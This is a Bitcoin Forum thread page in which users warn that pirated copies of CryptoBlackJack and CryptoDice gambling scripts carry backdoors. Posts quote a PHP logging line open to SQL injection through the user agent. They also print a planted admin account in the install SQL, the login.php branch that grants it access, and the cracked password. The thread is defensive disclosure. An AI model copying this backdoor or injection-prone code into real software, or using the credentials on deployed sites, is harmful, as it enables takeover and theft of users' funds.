Bitcoin Forum
May 28, 2024, 09:03:05 AM *
News: Latest Bitcoin Core release: 27.0 [Torrent]

Home   Help Search Login Register More  
Pages: « 1 2 [3]  All
  Print  
Author Topic: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts  (Read 6530 times)
MarkMJ

Activity: 714
Merit: 500

one for one and 1 2 3

View Profile
July 06, 2015, 05:13:47 PM

Just test the CryptoBlackJack
Have 3 backdoors but good for making a project
Sorry for user that drop this script.

I'm RED and that's GOOD, i will never be GREEN and that's not BAD! there's no one i'd rather be than me.
DEV for cryptocurrency but I HATE forks
elm
Legendary

Activity: 1050
Merit: 1000

View Profile
July 06, 2015, 05:44:14 PM

Just test the CryptoBlackJack
Have 3 backdoors but good for making a project
Sorry for user that drop this script.

are those 3 backdoors enough to get my coins?
myfirst

Activity: 156
Merit: 100

Crypto Currency Developer

View Profile
July 06, 2015, 06:29:34 PM

The admin login page is vulnerable to SQL injection.

Code:
mysql_query("INSERT INTO `admin_logs` (`admin_username`,`ip`,`browser`) VALUES ('".$_SESSION['username']."','".$_SERVER['REMOTE_ADDR']."','".$_SERVER['HTTP_USER_AGENT']."')");

This line is vulnerable to SQL injection if an attacker sends a custom user agent.

Edit: This is a recurring issue through out the script. Frequently the script records the user-agent without sanitizing it first.

Is this issue specifically with this pirated copy or with the original as well?
johny1976
Legendary

Activity: 1135
Merit: 1002

Developer

View Profile
July 06, 2015, 08:41:56 PM

The admin login page is vulnerable to SQL injection.

Code:
mysql_query("INSERT INTO `admin_logs` (`admin_username`,`ip`,`browser`) VALUES ('".$_SESSION['username']."','".$_SERVER['REMOTE_ADDR']."','".$_SERVER['HTTP_USER_AGENT']."')");

This line is vulnerable to SQL injection if an attacker sends a custom user agent.

Edit: This is a recurring issue through out the script. Frequently the script records the user-agent without sanitizing it first.

Is this issue specifically with this pirated copy or with the original as well?

Only this pirated copy, in our (original) version that is protected.
ca333

Activity: 520
Merit: 522

Developer - EthicHacker - BTC enthusiast

View Profile
November 11, 2015, 08:02:02 AM

I am also in the process of looking through this script, I agree Downloaders beward of anything and everything... I personally do not install any code that I have not read through myself, As I said on another thread though, I am pretty paranoid regarding security matters.

I will post my findings soon.

Backdoor Found

CoinDice.sql installs a table named "ga_players" with actually an admin account named "playertest" on install, you will see why this is an admin account on the next part.

Code:
DROP TABLE IF EXISTS `ga_players`;
CREATE TABLE `ga_players` (
  `id` int(255) NOT NULL AUTO_INCREMENT,
  `username` varchar(20) COLLATE utf8_unicode_ci NOT NULL,
  `passwd` text COLLATE utf8_unicode_ci NOT NULL,
  `ga_token` text COLLATE utf8_unicode_ci NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

INSERT INTO `ga_players` (`id`, `username`, `passwd`, `ga_token`) VALUES
(1, 'playertest',  '6d2aff483952d904179ca0c8c536a2c7', '');

When I found this I looked at the admin login script (https://github.com/felinegambler/CryptoDice/blob/master/admin/login.php)

Surprise Surprise

if $_POST variable has any data for "ga_playertest" it allows a login from the "ga_players" table instead of the admin table which in this case hold our fake admin "playertest" - (1, 'playertest',  '6d2aff483952d904179ca0c8c536a2c7', '');
Code:
if (!empty($_POST['ga_playertest'])) {
    $this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `ga_players` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
  } else {
    $this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `admins` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
  }

Everybody should remove this ASAP. You don't know what else could be hidden in here.

I am unsure what MD5 password this ("6d2aff483952d904179ca0c8c536a2c7" ) hash is, maybe someone with more experience in cracking password would know.

cloverme, I am assuming you have the original game? What line is meant to be in login.php?

i cracked the md5 hash:

6d2aff483952d904179ca0c8c536a2c7:playertest1

I advice anybody to USE THE ORIGINAL version from johny1976 because the posted scripts have many backdoors and they are pirated copies with NO licence...

this space is available (free) for humanitarian nonprofit organizations - please contact me
Pages: « 1 2 [3]  All
  Print  

Jump to: